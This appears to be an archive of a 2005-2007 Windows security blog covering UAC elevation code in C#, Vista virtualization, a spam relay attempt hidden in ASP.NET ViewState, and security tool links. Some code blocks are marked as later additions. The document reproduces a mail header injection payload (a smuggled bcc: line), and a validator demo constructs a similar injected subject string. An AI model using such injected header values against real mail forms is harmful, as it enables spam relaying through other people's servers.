Modifications: the method is now public instead of internal, and CLSCTX changed to local server (otherwise it wouldn't work).
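The two interop declarations that LaunchElevatedCOMObject calls, NativeMethods.BIND_OPTS3 and UnsafeNativeMethods.CoGetObject, are not shown on the page. The following is an added reconstruction rather than the VistaBridge sample's own code: it follows the documented Win32 layout of BIND_OPTS3 and the CoGetObject signature from ole32.dll, with field types chosen so that the method above compiles unchanged (uint cbStruct, int dwClassContext, IntPtr hwnd).

```csharp
using System;
using System.Runtime.InteropServices;

internal static class NativeMethods
{
    // Class-context flags from the Win32 CLSCTX enumeration; the elevation moniker
    // requires an out-of-process (local server) activation.
    [Flags]
    internal enum CLSCTX
    {
        CLSCTX_INPROC_SERVER = 0x1,
        CLSCTX_INPROC_HANDLER = 0x2,
        CLSCTX_LOCAL_SERVER = 0x4,
        CLSCTX_REMOTE_SERVER = 0x10
    }

    // Documented layout of BIND_OPTS3 (objidl.h); the elevation moniker reads
    // dwClassContext and hwnd, the remaining fields stay zero.
    [StructLayout(LayoutKind.Sequential)]
    internal struct BIND_OPTS3
    {
        internal uint cbStruct;
        internal uint grfFlags;
        internal uint grfMode;
        internal uint dwTickCountDeadline;
        internal uint dwTrackFlags;
        internal int dwClassContext;
        internal uint locale;
        internal IntPtr pServerInfo;   // COSERVERINFO*, not used for a local elevation
        internal IntPtr hwnd;          // owner window of the consent UI; IntPtr.Zero = none
    }
}

internal static class UnsafeNativeMethods
{
    // HRESULT CoGetObject(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv)
    // PreserveSig = false maps the final out-parameter to the return value and turns a
    // failing HRESULT (for instance when the user declines the consent prompt) into a
    // COMException instead of a silently null object.
    [DllImport("ole32.dll", CharSet = CharSet.Unicode, ExactSpelling = true, PreserveSig = false)]
    [return: MarshalAs(UnmanagedType.Interface)]
    internal static extern object CoGetObject(
        string pszName,
        [In] ref NativeMethods.BIND_OPTS3 pBindOptions,
        [In, MarshalAs(UnmanagedType.LPStruct)] Guid riid);
}
```

Because of PreserveSig = false, callers of LaunchElevatedCOMObject should expect a COMException when activation fails; catching it around the call in tryItButton_Click keeps a declined prompt from taking the application down.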

Next, we need a UI:

This button is the CommandLinkWinForms control from VistaBridgeLibary, with the ShieldIcon property set to true.

Let's hook up the event code:

private void tryItButton_Click(object sender, EventArgs e)
{
 Guid IID_ITheElevated =
  new Guid(0x5EFC3EFB, 0xC7D3, 0x4D00, 0xB7, 0x2E, 0x2F, 0x86, 0x4A, 0x1E, 0xAD, 0x06);

 Guid CLSID_TheElevated =
  new Guid(0x253E7696, 0xA524, 0x4E49, 0x9E, 0x50, 0xBF, 0xCC, 0x29, 0x91, 0x31, 0x23);

 object o = UACManager.LaunchElevatedCOMObject(CLSID_TheElevated, IID_ITheElevated);

 ITheElevated iface = (ITheElevated)o;

 // Call the method on the interface just like in the C++ example
 iface.ShowMe();

 // Release the object
 Marshal.ReleaseComObject(o);
}

The interface ID as well as class ID guids come directly from the C++ project (it is always a good idea to "speak" more than one language), but you could obtain those from the type library or registry as well if you don't have the source code of the component handy.

Object creation is handled via LaunchElevatedCOMObject, and the resulting object is cast to the interface from the imported type library. Notable (and important) is the last line: because the object wasn't created by the runtime, we have to take care of its destruction (the created interface doesn't have a Release() method, so we use Marshal.ReleaseComObject).

That's it - your managed code is now instantiating an elevated COM object that has full rein over the system.

ElevateCOMComponentSample.zip (117.07 KB)

Categories: .NET | Security | UAC | Use the source Luke | Vista
Tuesday, 30 January 2007 10:14:50 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 

When you are working with Windows Vista, you know that even the administrative users are stripped ("filtered") of their privileges for normal operations, and that when you have to perform tasks requiring administrative privileges, you are presented with a UAC elevation prompt. The idea of this blog post series is to provide you with working samples on how to work with elevation from inside managed applications (you might also want to read Windows Vista Application Development Requirements for User Account Control Compatibility).

I want to side-step the really easy part - providing a manifest to start the entire application elevated (a good idea if the application makes no sense at all unless it has administrative rights, like regedit.exe). You can find information on those topics in Adding a UAC Manifest to Managed Code and Vista: User Account Control.

Now back to the topic of this post: App A needs to start App B with administrative rights (because App B needs to write to HKLM or Program Files, for example). Therefore, we somehow must run App B as an administrative user (or with the unfiltered token of the current user). So how do we go about it?

First, some eye candy. You definitely already saw those nice shield icons before:

Those shield icons are stock on Windows Vista and indicate to the user that the action that hides behind the button requires elevation. I didn't create a button control myself - instead, I reused one that is readily available on the Web: Add a UAC Shield to your Winforms buttons in C#.

All I had to do myself was to start the Process ("App B"):

private void startProcess_Click(object sender, EventArgs e)
{
  ProcessStartInfo psi = new ProcessStartInfo();
  psi.FileName = theProcess;
  psi.Verb = "runas";
  Process.Start(psi);
}

The ticket (so to speak) for the elevation prompt is setting the Verb to "runas" in the ProcessStartInfo instance - this will pop up the elevation prompt if necessary when Process.Start is called.

This simplistic approach has a problem though - once App B is started, users can switch back to App A, because App B isn't "modal" for App A. To solve this problem, I incorporated the approach Daniel Moth outlined in his post Launch elevated and modal too:

private void launchModal_Click(object sender, EventArgs e)
{
  ProcessStartInfo psi = new ProcessStartInfo();
  psi.FileName = theProcess;
  psi.Verb = "runas";

  psi.ErrorDialog = true;
  psi.ErrorDialogParentHandle = this.Handle;

  try
  {
    Process p = Process.Start(psi);
    p.WaitForExit();
  }
  catch (Exception ex)
  {
    MessageBox.Show(ex.ToString());
  }
}

And that's it - App B is now modal. Once App B quits, control is relinquished to App A (which still doesn't run with administrative rights).
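Two things the sample's catch-all MessageBox hides are worth handling explicitly: a user who declines the consent prompt (ShellExecute then fails with the Win32 error ERROR_CANCELLED, 1223), and an App A that already runs elevated, where the "runas" verb is unnecessary. The helper below is an added example, not part of ElevateProcessSample; the class, method and enum names are assumptions.

```csharp
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Security.Principal;

// Added helper: starts "App B" elevated, waits for it (the modal behaviour from above)
// and tells a declined consent prompt apart from real failures.
public static class ElevatedLauncher
{
    // Win32 ERROR_CANCELLED, reported by ShellExecute when the user declines the UAC prompt.
    private const int ErrorCancelled = 1223;

    public enum LaunchResult { Exited, CancelledByUser, Failed }

    // True when this process already holds the full administrative token. A filtered
    // admin token carries the Administrators group as deny-only, so IsInRole returns false
    // for it, which is exactly the case where the "runas" verb is needed.
    public static bool IsElevated()
    {
        WindowsIdentity identity = WindowsIdentity.GetCurrent();
        WindowsPrincipal principal = new WindowsPrincipal(identity);
        return principal.IsInRole(WindowsBuiltInRole.Administrator);
    }

    public static LaunchResult StartAndWait(string fileName, out int exitCode)
    {
        exitCode = -1;
        ProcessStartInfo psi = new ProcessStartInfo(fileName);
        psi.UseShellExecute = true;          // the "runas" verb only works via ShellExecute
        if (!IsElevated())
            psi.Verb = "runas";              // prompt only when we are not elevated already

        try
        {
            Process p = Process.Start(psi);
            if (p == null)
                return LaunchResult.Failed;
            p.WaitForExit();                 // App A stays blocked until App B quits
            exitCode = p.ExitCode;
            p.Dispose();
            return LaunchResult.Exited;
        }
        catch (Win32Exception ex)
        {
            // A declined prompt is a normal user decision, not a crash worth a stack trace.
            return ex.NativeErrorCode == ErrorCancelled
                ? LaunchResult.CancelledByUser
                : LaunchResult.Failed;
        }
    }
}
```

In the button handler, the result can then drive the UI: CancelledByUser needs no error dialog at all, Failed is where the MessageBox from the sample belongs, and Exited lets App A inspect App B's exit code.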

ElevateProcessSample.zip (21.1 KB)

Categories: Security | UAC | Use the source Luke | Vista
Tuesday, 30 January 2007 08:14:31 (W. Europe Standard Time, UTC+01:00)  #    Comments [1]

 



#  Thursday, 25 January 2007

Got a developer question on how Windows Vista security affects your application? Then the MSDN Forum Security for Applications in Windows Vista is the right place to go.

Categories: Community | Security | Vista
Thursday, 25 January 2007 10:38:07 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 

I don't recommend turning off UAC (User Account Control) on Windows Vista, but there might be valid reasons to shut it off once in a while for testing purposes (like in a VM). That is where TweakUAC comes in handy:

Categories: Security | UAC | Vista
Thursday, 25 January 2007 10:32:21 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Friday, 22 December 2006

Michael Howard has all the links in this blog entry Online Security Sessions from TechEd IT Forum Available. Topics include: malware cleaning, UAC internals, social engineering, Vista kernel changes, Vista firewall and IPSec enhancements. Which reminds me that the post-conference DVDs should turn up in my mailbox RSN.

Categories: .NET | Security | Training and Conferences | Vista
Friday, 22 December 2006 16:46:01 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Tuesday, 12 December 2006

This is the firewall settings dialog - much the same as we know it from Windows XP already:

However, once you fire up the management console (mmc.exe), you can add snapins for advanced firewall configuration (ok, IPSec is one of my personal favorites and not necessary to configure the firewall per se...):

Once you have done this, you can now configure the firewall like, well, an administrator would expect - rule based:

Categories: Administration | Security | Vista
Tuesday, 12 December 2006 20:46:50 (W. Europe Standard Time, UTC+01:00)  #    Comments [1]

 



#  Wednesday, 29 November 2006

I have been promoting this tool more than once on this blog, so this time just the download link for version 2.1.

Categories: Cool Download | Security
Wednesday, 29 November 2006 09:33:58 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Wednesday, 22 November 2006

I admit it: I am a regular reader of the event log. In doing so, I came across an error message last week that I rarely get to see - invalid Viewstate:

Now, that wouldn't be a problem, usually at least. However, in this special case I went WTF? when I looked at the description more closely, especially at the PersistedState information:

PersistedState: a
Content-Transfer-Encoding: 8bit
Content-Type: text/plain
X-Mailer: EMUmail 4.5
Subject: jam n
bcc: <list of addresses removed by me />
comes from the loin in the middle of the back of the pig. t is a lean meaty 
cut of bacon, with relatively less fat compared to other cuts. iddle bacon
is much like back bacon
 
 
 
daa6c5071189f202ceb370d0e9d38c33
.

Come again - spam in Viewstate? What would be the point of this? After some research together with Alex I came across this article: Interesting Crack Attempt to Relay Spam (a more detailed article is available too: Form Post Hijacking). How I managed not to notice this attack vector any earlier I don't know, but I have to admit that the idea is pretty clever.

Counter-measures in general? Well, either don't allow user input in the headers at all, or vet the form fields for carriage returns / line feeds. Note that I did not verify whether any of the available mail components for .NET would actually be susceptible to this kind of attack.
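The second counter-measure, vetting form fields for carriage returns and line feeds before they come anywhere near a mail header, as an added example. It is not code from this post and makes no claim about any particular .NET mail component; the class name is assumed, and the sample strings are constructed to mirror the shape of the event-log entry above.

```csharp
using System;
using System.Net.Mail;

// Added example: user-supplied form fields are only allowed into header positions
// (From, Subject) once they are known to contain no line break, since a CR or LF is
// exactly what lets a "subject" field smuggle in extra headers such as bcc:.
public static class MailFormGuard
{
    public static bool ContainsLineBreak(string value)
    {
        return value != null && (value.IndexOf('\r') >= 0 || value.IndexOf('\n') >= 0);
    }

    public static void RequireHeaderSafe(string fieldName, string value)
    {
        if (ContainsLineBreak(value))
            throw new ArgumentException("Line break in form field '" + fieldName + "'");
    }

    // Recipients are fixed by the application; only From, Subject and Body come from the form.
    public static MailMessage Build(string from, string subject, string body)
    {
        RequireHeaderSafe("from", from);
        RequireHeaderSafe("subject", subject);

        // MailAddress throws FormatException for anything that is not one valid address,
        // which rules out a "from" field carrying a comma-separated recipient list.
        MailAddress sender = new MailAddress(from);
        MailMessage message = new MailMessage(sender, new MailAddress("feedback@example.com"));
        message.Subject = subject;
        message.Body = body;            // the body is the one place where line breaks are fine
        return message;
    }

    // Constructed inputs: a harmless subject and one shaped like the hijacked PersistedState.
    public static void Demo()
    {
        string harmless = "jam n";
        string hijacked = "jam n\r\nbcc: someone@example.net, other@example.net\r\n\r\ncomes from the loin";

        Console.WriteLine("harmless subject rejected: " + ContainsLineBreak(harmless));
        Console.WriteLine("hijacked subject rejected: " + ContainsLineBreak(hijacked));

        try
        {
            Build("visitor@example.org", hijacked, "some text");
        }
        catch (ArgumentException ex)
        {
            Console.WriteLine("Build refused the message: " + ex.Message);
        }
    }
}
```

Rejecting the field outright, rather than stripping the line breaks, is the safer default: a subject that contains a CR/LF pair was never typed by a regular visitor, so there is nothing worth salvaging and the rejected request is a useful signal in the log.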

Categories: ASP.NET | Security
Wednesday, 22 November 2006 09:47:35 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Tuesday, 21 November 2006

At next year's VSone in Munich (a German developer conference taking place in February), I will be doing three talks:

  • Visual Studio 2005 Team Edition for Database Professionals
  • User Account Control (UAC) in Your Applications
  • Advanced Code Access Security (CAS)

Two security topics, one team-development focused. See you in Munich!

Tuesday, 21 November 2006 16:21:21 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Monday, 20 November 2006

I already talked about the virtualization features of Windows Vista in a previous blog post entitled UAC Redirection 4 Fun & Profit. Today, I want to tackle the file redirection that happens when UAC virtualizes your application and you try to write to a location it monitors - like the Program Files directory:

This command prompt was started with Run as Administrator (the window title hints at that). I was UAC-prompted, and then could go about my business. Not so if I run it unelevated:

It tells me that I don't have access. Right, not a big surprise, but why didn't virtualization kick in for cmd.exe? Because it is off by default for the command line. How can I turn it on? Well, easy. Go to Windows Task Manager:

Add the Virtualization column:

After a bit of drag & drop magic I made it the second column, and I can see which applications are virtualized and which are not. And sure enough, cmd.exe isn't. Right-clicking allows you to change that:

You will be warned that this will possibly affect the running application, but go ahead. And then try again to write to the Program Files location:

This time I can write to Program Files - wait a second, really? No, it of course went to the virtual store for this user account:

As you can see, it lives next to files from a heck of a lot of applications that wanted to write somewhere (like system32) they didn't have access to - but virtualization (on by default for applications, except those opting out explicitly) took care of the disk operations and redirected them to the virtual store. Note that a well-written application (i.e. one that doesn't require administrative rights) wouldn't show up here...

Categories: Security | Vista
Monday, 20 November 2006 08:03:43 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Sunday, 12 November 2006

This Q&A item is part of the current MSDN magazine's Security Brief's column by Keith Brown. I am pretty sure that this problem will rear its head sooner or later on every developer's machine, that's why I am 'pinning' the link in my blog for my own reference too.

Categories: .NET | IIS | Security | 3.0 | WCF
Sunday, 12 November 2006 16:41:26 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Thursday, 09 November 2006

The Windows Vista Security Guide provides recommendations and tools to further harden Windows Vista. Well, go get it.

Categories: Security | Vista
Thursday, 09 November 2006 08:28:41 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Wednesday, 01 November 2006

The November 2006 issue has lots of good security articles, which are available online too. Check out Security Habits, Threat Modeling (STRIDE approach), Extending SDL or SQL Security to name a few.

Categories: .NET | Security | SQL Server
Wednesday, 01 November 2006 13:56:55 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Monday, 30 October 2006

Last Tuesday, I held the talk "Advanced Code Access Security" at UG Styria in Graz. This talk was originally part of the MSDN Security Briefings held in Austria earlier this year, for which MS Austria had asked MVPs to help create and deliver security content. Advanced CAS seemed an interesting enough developer topic to re-run at user groups, and Mario (the author of this session) has allowed me to publish the slide deck and demos for the general public.

AdvancedCodeAccessSecurity.pdf (4542 KB)

AdvancedCAS.zip (599.6 KB)

Please note that I have published only demos four (setting CAS via setup) and six (using CAS in addin application) - those are the "completed" versions of the demos.

Categories: .NET | 2 Ohhhh | Community | Cool Download | Security | this
Monday, 30 October 2006 09:10:54 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Monday, 21 August 2006

This is a whitepaper published by MS (download here). From the download page:

Gain valuable information about the concepts of social engineering within the IT security workspace. In section one, the guide provides a working definition of social engineering that can be used within a company's security policies and is meaningful to non-IT security staff. The guide describes the aims and objectives of an attacker and shows how social engineering, like hacking, is a threat to all businesses, not just enterprise or government institutions. The guide will also cover:

  • Social engineering and the defense-in-depth layered model
  • Social engineering threats and defense
  • Online, telephone-based, and waste management threats
  • Personal approaches
  • Reverse social engineering
  • Designing and implementing defenses against social engineering threats
  • Developing a security management framework
  • Risk management
  • Social engineering in the organizational security policy
  • Awareness
  • Managing incidents
  • Operational considerations
  • Security policy for social engineering threat checklists
Categories: Security
Monday, 21 August 2006 15:17:11 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Thursday, 29 June 2006
Categories: .NET | Project Management | Security
Thursday, 29 June 2006 07:47:25 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 31 May 2006

When you run an application that needs administrative rights (in this specific case via a manifest file), you are prompted with a UAC dialog to allow this operation:

This is the dialog you get for the "default" user, the one you create during setup that is a member of the Administrators group. Contrast that to the dialog a standard user is presented with:

(screenshot: uacpromptforadmin.PNG)

Now, I am fine with prompting the user to enter administrative credentials. However, I am not fine with providing the user with the name of the administrative user(s) on that machine. In my opinion, this is giving away security-related information without need.

Update Of course you can always use net localgroup Administrators to get a list of the members of the Administrators group (Markus pinged me on that one). This feature has been available for ages, true. However, I am not convinced that the UAC convenience of providing the administrative accounts on a silver platter is really necessary.

Categories: Security | this | Vista
Wednesday, 31 May 2006 14:46:05 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 24 May 2006

Michael Howard plugged his latest book The Security Development Lifecycle in his blog back in April (A New Book: The Security Development Lifecycle). It isn't yet available in stores, but I decided to preorder because I'm really looking forward to this book. Why? Because it describes a security process in development that works - the SDL @ Microsoft.

Categories: Books | Security
Wednesday, 24 May 2006 08:40:22 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 23 May 2006

A /. article pointed me to the blog post Reporting Vulnerabilities is for the Brave. Sounds familiar. Been there, done that. A customer had a Web site, and I told them about a problem. They told their vendor. And the vendor went after me - probably because, like most security-unconscious companies they felt threatened in one way or another.

Therefore I wholeheartedly agree with the instructions outlined, plus: lean back, and enjoy when the bad guys whack that company. Yes, this is controversial, but as long as companies don't "get it" that there are people that want to help them when reporting vulnerabilities, it is definitely better to keep your trap shut.

Aside from the cynical advice in the above paragraph, here is something to consider for your company: establish a policy - and publish it! - that you welcome security reports by security researchers (and Joe Average for that matter). This goes a long way to getting the threats mitigated before they are exploited.

Categories: Newsbites | Security | this
Tuesday, 23 May 2006 10:12:41 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Sunday, 21 May 2006

The TAM tool is now available as release candidate 1. If you don't know it (already), here is the quick scoop from the download page: Microsoft Threat Analysis & Modeling tool allows non-security subject matter experts to enter already known information including business requirements and application architecture which is then used to produce a feature-rich threat model. Along with automatically identifying threats, the tool can produce valuable security artifacts such as:

  • Data access control matrix
  • Component access control matrix
  • Subject-object matrix
  • Data Flow
  • Call Flow
  • Trust Flow
  • Attack Surface
  • Focused reports

By the way, use this link to search for the video series on threat modeling in the Download Center!

Categories: Cool Download | Security
Sunday, 21 May 2006 12:30:05 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 17 May 2006

Tracking down the URL for the Webcast Detecting and Debugging Common Application Issues Using the Windows Application Verifier really turned into a scavenger hunt today... if you don't know what AppVerifier is, download it here, and read more here.

Categories: Security | Team System
Wednesday, 17 May 2006 21:07:47 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Thursday, 11 May 2006

On Tuesday I was presenting a Windows Vista security session, which included UAC (user account control) and respective demos. One part was showing UAC data redirection, and for this blog post I will stick with the registry side of things.

Why this redirection in the first place? Well, old legacy applications do tend to assume that you are running as admin on your box. Thus, those apps simply store "stuff" in the HKLM hive of the registry, instead of HKCU. To allow such misguided apps to run on Vista smoothly, UAC automagically redirects write operations from the actual HKLM location to a VirtualStore branch of the current user's profile.

Let's look at an example of a classic no-no:

try
{
  RegistryKey MyTest = Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Microsoft SDKs\\.NETFramework\\v2.0", true);
  MyTest.SetValue("InstallationFolder", ContentsText.Text, RegistryValueKind.String);
  MyTest.Close();
  ResultsLabel.Text = "Successfully written to registry!";
}
catch (Exception ex)
{
  ResultsLabel.Text = "Unable to write to registry: " + ex.Message;
}

On XP, being non-admin, you would end up in the catch block. Not so on Vista. With Vista, this will work out ok, and the data will be stored like this:

Nice indeed. Or is it actually nice? Let's look at the code for reading the value again:

try
{
  RegistryKey MyTest = Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Microsoft SDKs\\.NETFramework\\v2.0", true);
  ContentsText.Text = MyTest.GetValue("InstallationFolder") as string;
  ResultsLabel.Text = "Successfully read from registry!";
}
catch (Exception ex)
{
  ResultsLabel.Text = "Unable to read from registry: " + ex.Message;
}

So what's your guess where the value will come from - the original HKLM location or the redirected HKCU VirtualStore location? Right, the VirtualStore is the winner.

Now, I intentionally picked an existing value in the registry to "overwrite". Imagine somebody writing a "fuzzer" to go over every single value in HKLM and write back gibberish for every value it finds. The original application will now too see this gibberish instead of the original good values.

Time will tell whether virtualizing based on user rather than application will do more harm than good. Because thanks to UAC, malware needs no extra rights to botch up your registry...

Update Yes, sure, you can turn off this virtualization. Check out the blog entry User Account Control Windows Vista Policies.
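Both the Program Files redirection shown in the post Virtualization above and the registry redirection in this post leave their trace in the same per-user VirtualStore, and as the read example shows, asking HKLM from inside a virtualized process just returns the shadow copy. The reliable check for "did my write get redirected" is therefore to look into the VirtualStore directly. The following is an added example, not code from either post: the VirtualStore layout is Windows' own, while the class and method names and the sample file path are assumptions.

```csharp
using System;
using System.IO;
using Microsoft.Win32;

// Added example: detects whether a write an application believed went to HKLM or to
// Program Files was in fact redirected into the current user's VirtualStore.
public static class VirtualStoreCheck
{
    // HKLM\SOFTWARE\<sub> is virtualized to HKCU\Software\Classes\VirtualStore\MACHINE\SOFTWARE\<sub>
    private const string RegistryVirtualStore = @"Software\Classes\VirtualStore\MACHINE\SOFTWARE\";

    // softwareSubKey is relative to HKLM\SOFTWARE, e.g. @"Microsoft\Microsoft SDKs\.NETFramework\v2.0".
    // Returns the shadow value, or null when no redirected copy exists (HKLM is then authoritative).
    public static object FindRedirectedRegistryValue(string softwareSubKey, string valueName)
    {
        using (RegistryKey shadow = Registry.CurrentUser.OpenSubKey(RegistryVirtualStore + softwareSubKey, false))
        {
            return shadow == null ? null : shadow.GetValue(valueName);
        }
    }

    // C:\Program Files\X\y.txt is virtualized to %LOCALAPPDATA%\VirtualStore\Program Files\X\y.txt:
    // the drive root is dropped and the rest of the path is kept as-is.
    public static string VirtualStorePathFor(string fullPath)
    {
        string root = Path.GetPathRoot(fullPath);              // "C:\"
        string relative = fullPath.Substring(root.Length);     // "Program Files\X\y.txt"
        string localAppData = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
        return Path.Combine(Path.Combine(localAppData, "VirtualStore"), relative);
    }

    public static bool FileWasRedirected(string fullPath)
    {
        return File.Exists(VirtualStorePathFor(fullPath));
    }

    // Checks the key from this post and a constructed Program Files path.
    public static void Demo()
    {
        object shadowed = FindRedirectedRegistryValue(@"Microsoft\Microsoft SDKs\.NETFramework\v2.0", "InstallationFolder");
        Console.WriteLine(shadowed == null
            ? "InstallationFolder: no redirected copy, HKLM is authoritative"
            : "InstallationFolder was redirected, VirtualStore holds: " + shadowed);

        string file = @"C:\Program Files\MyApp\settings.txt";   // constructed example path
        Console.WriteLine(FileWasRedirected(file)
            ? "file write was redirected to " + VirtualStorePathFor(file)
            : "no redirected copy of " + file);
    }
}
```

Run from a test account after exercising an application, a non-empty result is the practical proof that the application still depends on virtualization, i.e. that it writes to locations a standard user should not be writing to.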

Categories: Longhorn | Security
Thursday, 11 May 2006 14:42:03 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Friday, 05 May 2006

Next week, I am doing the first in a series of security on-site briefings for Microsoft Austria. Mario has blogged about our TTT event in two entries Security Technical Briefings - Train-The-Trainer... a looong evening (Part 1) and Security Technical Briefings - Part 2. Thanks to the workshop character, no two briefings will be alike.

Friday, 05 May 2006 08:41:52 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Thursday, 04 May 2006

The process of threat modeling is built on a simple principle: To build a feasibly secure system, one must understand all the threats in that system. The challenge, however, is in making threat modeling more accessible to non-specialists. Microsoft has developed a process through which minimal input can produce a feature-rich threat model that identifies a wide range of critical information including contextual threats, trust boundaries, fracture points, attack surfaces, and direct and transitive access control. This podcast describes and demonstrates this threat modeling process, outlines its benefits, and shows how threat modeling fits into the Microsoft Security Development Lifecycle.

Download & Listen

Categories: Security
Thursday, 04 May 2006 10:28:20 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 02 May 2006

Found this on Alex' blog (he posted it in German last week): Microsoft UK has released a document (PDF) titled "The Developer Highway Code" (The drive for safer coding), which covers the following topics:

  • Integrating Security into the Lifecycle
  • Security Objectives
  • Web Application Security Design Guidelines 
  • Threat Modelling
  • Security Architecture and Design
  • Security Code Review
  • Security Deployment Review

The document covers v1 and v2 of the .NET Framework, and it does contain useful checklists. Be sure to grab it!

Categories: .NET | Security
Tuesday, 02 May 2006 15:17:31 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 12 April 2006

During the MVP Open Day in Munich last week (Friday & Saturday), we had a presentation by Talhah Mir (ACE Team, Threat Modeling blogs) on threat modeling - with which (I hope) everyone is familiar by now. During the talk, he pointed us to an interesting resource: A Chronology of Data Breaches from the Privacy Rights Clearinghouse. Quite an interesting list of incidents, which gives you an idea of the ratio of actual hacking vs dishonest insiders, as well as other types of security breaches.

Categories: Community | Security
Wednesday, 12 April 2006 10:20:38 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 05 April 2006

Aside from disabling UAP, I also went back to THE Administrator account. Doing so can get quite messy unless you join your Vista box to a domain, as outlined in the blog entry Trouble signing on as THE Administrator on 5308? Now I have access to applicationHost.config again. Good security does get in the way, but this is just way too onerous.

Categories: Longhorn | Security
Wednesday, 05 April 2006 10:20:04 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 

After 'killing' three Vista installations yesterday, laziness got the better of me. I launched msconfig.exe, went to the Tools tab, and did this:

A reboot later I am a happy (and no longer annoyed) camper. Security obviously went out the window, however, I don't think this installation will live long enough either for this to be an issue.

Categories: Longhorn | Security
Wednesday, 05 April 2006 08:48:51 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 29 March 2006

If you need to find out just what devices are running Web services in your network (aside from the obvious Web servers, nowadays this includes printers, access points and many more), then you should check out httprint. It doesn't rely on server banners or fall for other obfuscation techniques, so it is quite handy for finding out just what software is running on that box.

Categories: Administration | IIS | Security
Wednesday, 29 March 2006 15:14:01 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 28 March 2006

In case you need it too: Configuring SSL Host Headers shows you how to get up and running with one IP, port and certificate but multiple host headers. All you need is a wildcard certificate (learn more here) and some CLI magic because there is no UI for it. Basically, it boils down to (for example):

adsutil.vbs set w3svc/siteid/SecureBindings ":443:host.wildcarddomain.com"

Categories: Administration | IIS | Security
Tuesday, 28 March 2006 19:33:32 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 

Don't know how this one could slip by me - Windows Server 2003 Service Pack 1 (SP1) shipped a rather important update: you can run SSL in kernel mode (http.sys) instead of user mode. There are restrictions which are detailed here (most B2C SSL sites will do just fine), and the procedure to enable kernel-mode SSL shows how to get up and running in no time. Mostly you are only dealing with the registry key HKLM\System\CurrentControlSet\Services\HTTP\Parameters\EnableKernelSSL.

Categories: Administration | IIS | Security
Tuesday, 28 March 2006 19:24:04 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 01 March 2006

Six short & modular security training modules have been launched:

  • Canonicalization Lab
  • Cookies Lab
  • Cross Site Scripting Lab
  • Regular Expressions Lab
  • SQL Injection Lab
  • Validation Controls Lab
Categories: Security
Wednesday, 01 March 2006 07:40:45 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Friday, 24 February 2006

Brought to you by MSDN TV: Watch the White Hats and the Black Hats battle for the security of Las Vegas, Nevada. Jessi Knapp and Microsoft Security Guru Joe Stagner narrate as the Hackers try to gain control of The Plaza's online money management system and our Security Team tries to stay one step ahead. Watch

Categories: Security
Friday, 24 February 2006 02:52:05 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Sunday, 19 February 2006

On my flight to Seattle today (or yesterday, depending on the time zone) I started to read Professional ASP.NET 2.0 Security, Membership, and Role Management by Stefan Schackow. The book definitely is a must-have for every ASP.NET developer, even if you decide to read one chapter only: A Matter of Trust (#3). This one will save you loads of time when you have to deploy an application into non-full trust environments. However, the other chapters are worthwhile too, like #2, which details exactly which identity is used when by what part of the engine. Bottom line: highly recommended reading.

Categories: .NET | 2 Ohhhh | ASP.NET | Books | Security
Sunday, 19 February 2006 09:21:00 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Wednesday, 01 February 2006

THE security scanner has been made available in version 4.0. Nmap is a tool you should not miss out on when you are in need of scanning networks and hosts.

Categories: Cool Download | Security
Wednesday, 01 February 2006 08:48:16 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Thursday, 17 November 2005

Wired is running a story by Bruce Schneier: Real Story of the Rogue Rootkit. Spot on.

Categories: Security
Thursday, 17 November 2005 19:07:38 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Wednesday, 05 October 2005

David Litchfield published the paper Data-mining with SQL Injection and Inference (more NISR papers). From the abstract: When drilling for data via SQL injection there are three classes of attack – inband, out-of-band and the relatively unknown inference attack. Inband attacks extract data over the same channel between the client and the web server, for example, results are embedded in a web page via a union select. Out-of-band attacks employ a different communications channel to drill for data by using database mail or HTTP functions for example. Inference attacks stand alone in the fact that no actual data is transferred – rather, a difference in the way an application behaves can allow an attacker to infer the value of the data.
